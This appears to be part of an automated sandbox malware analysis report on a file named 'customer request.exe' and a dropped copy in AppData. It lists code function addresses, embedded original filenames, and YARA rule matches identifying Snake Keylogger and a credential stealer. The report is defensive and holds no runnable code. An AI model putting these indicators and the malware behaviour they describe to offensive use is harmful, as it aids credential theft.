Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069578F0	8_2_069578F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069508F0	8_2_069508F0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069508E0	8_2_069508E0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06952818	8_2_06952818
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695D018	8_2_0695D018
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06952807	8_2_06952807
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950006	8_2_06950006
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06954430	8_2_06954430
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950040	8_2_06950040
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957049	8_2_06957049
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06951191	8_2_06951191
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06955198	8_2_06955198
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695518A	8_2_0695518A
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069581B0	8_2_069581B0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_069581A0	8_2_069581A0
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695C9C8	8_2_0695C9C8
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957900	8_2_06957900
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950D39	8_2_06950D39
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_0695BD28	8_2_0695BD28
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957D58	8_2_06957D58
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06950D48	8_2_06950D48
Source: C:\Users\user\Desktop\customer request.exe	Code function: 8_2_06957D48	8_2_06957D48
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_0318D6CC	10_2_0318D6CC
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EEC908	10_2_08EEC908
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EEDFEB	10_2_08EEDFEB
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EE1520	10_2_08EE1520
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 10_2_08EE1F40	10_2_08EE1F40
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A953F0	13_2_02A953F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9A1E8	13_2_02A9A1E8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9C1D2	13_2_02A9C1D2
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A97680	13_2_02A97680
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9C790	13_2_02A9C790
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9C4B2	13_2_02A9C4B2
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A94AD9	13_2_02A94AD9
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9CA70	13_2_02A9CA70
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9EE68	13_2_02A9EE68
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A96F09	13_2_02A96F09
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9BD28	13_2_02A9BD28
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9CD52	13_2_02A9CD52
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9E388	13_2_02A9E388
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9E379	13_2_02A9E379
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A93572	13_2_02A93572
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_02A9BEF0	13_2_02A9BEF0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_052511C0	13_2_052511C0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05258460	13_2_05258460
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05253870	13_2_05253870
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250040	13_2_05250040
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05257B70	13_2_05257B70
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525B930	13_2_0525B930
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250900	13_2_05250900
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E908	13_2_0525E908
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250D60	13_2_05250D60
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525ED60	13_2_0525ED60
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525B940	13_2_0525B940
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250D51	13_2_05250D51
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525ED50	13_2_0525ED50
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525F1A9	13_2_0525F1A9
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_052511B0	13_2_052511B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525F1B8	13_2_0525F1B8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525BD88	13_2_0525BD88
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05257D90	13_2_05257D90
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525BD98	13_2_0525BD98
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525C1E0	13_2_0525C1E0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525C1F0	13_2_0525C1F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250006	13_2_05250006
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525DC00	13_2_0525DC00
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05253862	13_2_05253862
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E04B	13_2_0525E04B
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E058	13_2_0525E058
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_052504A0	13_2_052504A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E4A0	13_2_0525E4A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E4B0	13_2_0525E4B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_05250491	13_2_05250491
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525B4E8	13_2_0525B4E8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_052508F0	13_2_052508F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525E8F8	13_2_0525E8F8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525B4D7	13_2_0525B4D7
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525D340	13_2_0525D340
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525D350	13_2_0525D350
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525D7A8	13_2_0525D7A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525D798	13_2_0525D798
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_052573E8	13_2_052573E8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525DBF1	13_2_0525DBF1
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525C638	13_2_0525C638
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525F600	13_2_0525F600
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525F610	13_2_0525F610
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525FA68	13_2_0525FA68
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525C648	13_2_0525C648
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525FA59	13_2_0525FA59
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525CAA0	13_2_0525CAA0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525CA90	13_2_0525CA90
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525CEEB	13_2_0525CEEB
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0525CEF8	13_2_0525CEF8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696B6E8	13_2_0696B6E8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06968608	13_2_06968608
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696AA58	13_2_0696AA58
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696D670	13_2_0696D670
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696C388	13_2_0696C388
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06968BF2	13_2_06968BF2
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696B0A0	13_2_0696B0A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696A408	13_2_0696A408
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696D028	13_2_0696D028
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069611A0	13_2_069611A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696C9D8	13_2_0696C9D8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696BD38	13_2_0696BD38
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965EB8	13_2_06965EB8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696B6D9	13_2_0696B6D9
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965EC8	13_2_06965EC8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965618	13_2_06965618
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696560B	13_2_0696560B
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696AA48	13_2_0696AA48
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965A70	13_2_06965A70
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696D662	13_2_0696D662
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965A60	13_2_06965A60
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069633B8	13_2_069633B8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069633A8	13_2_069633A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966BD0	13_2_06966BD0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966BC1	13_2_06966BC1
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696A3F8	13_2_0696A3F8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966313	13_2_06966313
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06963730	13_2_06963730
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966320	13_2_06966320
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966778	13_2_06966778
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696C378	13_2_0696C378
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06966768	13_2_06966768
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967497	13_2_06967497
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06960498	13_2_06960498
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696B08F	13_2_0696B08F
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06960488	13_2_06960488
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069628B0	13_2_069628B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069674A8	13_2_069674A8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069678F0	13_2_069678F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069608F0	13_2_069608F0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069608E0	13_2_069608E0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696001D	13_2_0696001D
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696D018	13_2_0696D018
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06962807	13_2_06962807
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06962809	13_2_06962809
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06964430	13_2_06964430
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967050	13_2_06967050
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06960040	13_2_06960040
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967040	13_2_06967040
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06965198	13_2_06965198
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696518B	13_2_0696518B
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069681B0	13_2_069681B0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069681A0	13_2_069681A0
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696C9C8	13_2_0696C9C8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_069685F8	13_2_069685F8
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967900	13_2_06967900
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06960D39	13_2_06960D39
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_0696BD28	13_2_0696BD28
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967D58	13_2_06967D58
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06960D48	13_2_06960D48
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Code function: 13_2_06967D48	13_2_06967D48

Source: customer request.exe

Static PE information: invalid certificate

Source: customer request.exe, 00000000.00000002.1721290300.000000000328A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs customer request.exe
Source: customer request.exe, 00000000.00000002.1722509797.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs customer request.exe
Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs customer request.exe
Source: customer request.exe, 00000000.00000002.1726442804.0000000007E8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebWhS.exeF vs customer request.exe
Source: customer request.exe, 00000000.00000002.1719943268.00000000013DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs customer request.exe
Source: customer request.exe, 00000000.00000002.1722509797.0000000004A6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs customer request.exe
Source: customer request.exe, 00000000.00000002.1726187313.0000000007DC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs customer request.exe
Source: customer request.exe, 00000000.00000002.1720699808.0000000002EE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs customer request.exe
Source: customer request.exe, 00000008.00000002.4134311882.0000000000D57000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs customer request.exe
Source: customer request.exe	Binary or memory string: OriginalFilenamebWhS.exeF vs customer request.exe

Source: customer request.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
